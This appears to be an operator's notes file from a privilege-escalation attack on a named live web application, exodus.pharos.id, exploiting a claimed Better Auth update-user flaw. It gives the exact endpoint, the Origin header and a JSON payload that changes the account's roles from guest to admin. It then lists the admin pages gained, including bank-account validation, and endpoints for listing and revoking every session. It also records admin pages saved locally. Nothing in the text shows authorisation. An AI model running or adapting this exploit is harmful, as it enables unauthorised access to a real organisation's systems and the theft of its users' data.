# Better Auth Privilege Escalation — CVE-2026-53515
# Date: 2026-09-24

## 🔴 PRIVILEGE ESCALATION ACHIEVED

### Method: Better Auth update-user with Origin header
- Endpoint: POST /api/auth/update-user
- Required header: Origin: https://exodus.pharos.id
- Payload: {"roles": ["admin"], "nip": "P190528"}
- Response: 200 {"status":true}
- Result: roles changed from ["guest"] to ["admin"]

### CVE: CVE-2026-53515 (Better Auth SSO Privilege Escalation)
- Missing admin role check in update-user endpoint
- Any authenticated user can set arbitrary roles
- Better Auth version: 1.6+ (from GitLab skills docs)

### Access After Escalation
- 26 pages accessible (was 18 with guest)
- 8 NEW admin pages:
  - /admin (13KB)
  - /admin/settings (20KB)
  - /admin/dashboard (20KB)
  - /admin/bank-account-validation/validation (23KB)
  - /custom-diskon (22KB)
  - /custom-diskon/approval (22KB)
  - /activities/quiz (21KB)
  - /activities/mcl (22KB)
  - /insentive-sc (21KB)
  - /pssp/kebutuhan-group (21KB)

### Better Auth Endpoints Available
- GET /api/auth/get-session: 200 (session + user + idToken)
- GET /api/auth/list-sessions: 200 (ALL sessions, 20 total)
- POST /api/auth/update-user: 200 (change name, nip, roles)
- POST /api/auth/revoke-session: 200 (revoke any session)
- POST /api/auth/oauth2/link: 200 (initiate OAuth link)
- POST /api/auth/change-password: 400 (no credential account)

### Still Blocked
- api.pharos.id/exodus: 401 (NIP=test in Keycloak JWT, not in backend DB)
- Better Auth admin endpoints: 404 (not configured)
- Signup: 404 (disabled)
- NIP in Keycloak JWT cannot be changed via account API

### Saved Files
- /tmp/exodus_admin.html (14KB)
- /tmp/exodus_admin_settings.html (20KB)
- /tmp/exodus_admin_bank_validation.html (23KB)
- /tmp/exodus_admin_dashboard.html (20KB)
